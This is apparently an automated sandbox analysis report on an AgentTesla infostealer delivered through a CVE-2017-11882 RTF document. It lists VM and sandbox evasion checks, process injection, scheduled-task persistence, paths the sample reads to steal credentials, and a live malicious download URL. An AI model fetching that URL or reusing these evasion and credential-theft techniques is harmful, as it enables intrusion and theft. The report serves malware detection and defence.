Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2143255573.0000000002216000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powiuytrewasfdfghjkl.exe PID: 260, type: MEMORY
Source: Yara match	File source: 4.2.powiuytrewasfdfghjkl.exe.21f06d4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powiuytrewasfdfghjkl.exe.22b1384.4.raw.unpack, type: UNPACKEDPE

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: powiuytrewasfdfghjkl.exe, 00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: powiuytrewasfdfghjkl.exe, 00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Code function: 4_2_000F6F0E sgdt fword ptr [eax]

4_2_000F6F0E

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Window / User API: threadDelayed 9528

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2364	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe TID: 2680	Thread sleep time: -61284s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe TID: 2680	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe TID: 2880	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe TID: 2824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe TID: 2448	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe TID: 2864	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe TID: 2864	Thread sleep time: -150000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: powiuytrewasfdfghjkl.exe, 00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: powiuytrewasfdfghjkl.exe, 00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: powiuytrewasfdfghjkl.exe, 00000004.00000002.2143071601.0000000000765000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: powiuytrewasfdfghjkl.exe, 00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: powiuytrewasfdfghjkl.exe, 00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Memory written: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gDgbkskgY' /XML 'C:\Users\user\AppData\Local\Temp\tmpE966.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process created: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Jump to behavior

Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398179651.0000000000A80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398179651.0000000000A80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398179651.0000000000A80000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Queries volume information: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Queries volume information: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000007.00000002.2397959095.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2144135612.00000000033C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2398572608.00000000023FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2398959067.00000000026E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2143895989.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powiuytrewasfdfghjkl.exe PID: 2956, type: MEMORY
Source: Yara match	File source: Process Memory Space: powiuytrewasfdfghjkl.exe PID: 260, type: MEMORY
Source: Yara match	File source: 4.2.powiuytrewasfdfghjkl.exe.33d39f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powiuytrewasfdfghjkl.exe.34d9ca0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powiuytrewasfdfghjkl.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powiuytrewasfdfghjkl.exe.34d9ca0.7.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Source: Yara match	File source: 00000007.00000002.2398572608.00000000023FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2398959067.00000000026E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powiuytrewasfdfghjkl.exe PID: 2956, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000007.00000002.2397959095.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2144135612.00000000033C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2398572608.00000000023FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2398959067.00000000026E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2143895989.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powiuytrewasfdfghjkl.exe PID: 2956, type: MEMORY
Source: Yara match	File source: Process Memory Space: powiuytrewasfdfghjkl.exe PID: 260, type: MEMORY
Source: Yara match	File source: 4.2.powiuytrewasfdfghjkl.exe.33d39f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powiuytrewasfdfghjkl.exe.34d9ca0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powiuytrewasfdfghjkl.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powiuytrewasfdfghjkl.exe.34d9ca0.7.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Scheduled Task/Job1	Process Injection112	Disable or Modify Tools11	OS Credential Dumping2	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Deobfuscate/Decode Files or Information1	Input Capture21	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Logon Script (Mac)	Software Packing12	NTDS	Security Software Discovery211	Distributed Component Object Model	Input Capture21	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Virtualization/Sandbox Evasion14	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol132	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion14	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PROFORMA INVOICE-09765434.doc	43%	Virustotal		Browse
PROFORMA INVOICE-09765434.doc	53%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\E6RVLMWo0fz1jFA[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\gDgbkskgY.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
7.2.powiuytrewasfdfghjkl.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

Source	Detection	Scanner	Label	Link
globalteamacademy.com	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://PtITHy.com	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe	12%	Virustotal		Browse
http://globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe	100%	Avira URL Cloud	malware
http://www.acabogacia.org0	0%	URL Reputation	safe
http://www.acabogacia.org0	0%	URL Reputation	safe
http://www.acabogacia.org0	0%	URL Reputation	safe
http://www.acabogacia.org0	0%	URL Reputation	safe
http://www.echoworx.com/ca/root2/cps.pdf0	0%	URL Reputation	safe
http://www.echoworx.com/ca/root2/cps.pdf0	0%	URL Reputation	safe
http://www.echoworx.com/ca/root2/cps.pdf0	0%	URL Reputation	safe
http://www.echoworx.com/ca/root2/cps.pdf0	0%	URL Reputation	safe
http://www.disig.s	0%	Avira URL Cloud	safe
http://www.disig.s/ca_disi	0%	Avira URL Cloud	safe
https://www.netlock.hu/docs/	0%	URL Reputation	safe
https://www.netlock.hu/docs/	0%	URL Reputation	safe
https://www.netlock.hu/docs/	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://tempuri.org/databaseSystemDataSet.xsd	0%	Avira URL Cloud	safe
http://kyefCjCDFs.com	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.trustdst.com/certificates/policy/ACES-index.html0	0%	URL Reputation	safe
http://www.trustdst.com/certificates/policy/ACES-index.html0	0%	URL Reputation	safe
http://www.trustdst.com/certificates/policy/ACES-index.html0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://www.netlock.net/docs	0%	URL Reputation	safe
https://www.netlock.net/docs	0%	URL Reputation	safe
https://www.netlock.net/docs	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://www.e-trust.be/CPS/QNcerts	0%	URL Reputation	safe
http://www.e-trust.be/CPS/QNcerts	0%	URL Reputation	safe
http://www.e-trust.be/CPS/QNcerts	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
globalteamacademy.com	43.252.37.193	true	true	7%, Virustotal, Browse	unknown
mail.privateemail.com	198.54.122.60	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://kyefCjCDFs.com	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://127.0.0.1:HTTP/1.1	powiuytrewasfdfghjkl.exe, 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	powiuytrewasfdfghjkl.exe, 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.e-me.lv/repository0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.acabogacia.org/doc0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	false		high
http://ocsp.sectigo.com0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	powiuytrewasfdfghjkl.exe, 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://PtITHy.com	powiuytrewasfdfghjkl.exe, 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ancert.com/cps0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.acabogacia.org0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.echoworx.com/ca/root2/cps.pdf0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403369507.0000000008056000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.disig.s	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.disig.s/ca_disi	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.netlock.hu/docs/	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
